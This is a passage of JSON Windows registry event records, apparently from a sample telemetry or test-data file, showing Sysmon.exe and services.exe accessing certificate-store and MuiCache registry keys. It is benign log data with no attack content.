"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570849020000, - 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - 
"registry_value": "Certificates", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": 
"{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": 
"C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - 
"event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - 
"timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - 
"process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": 
"{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": 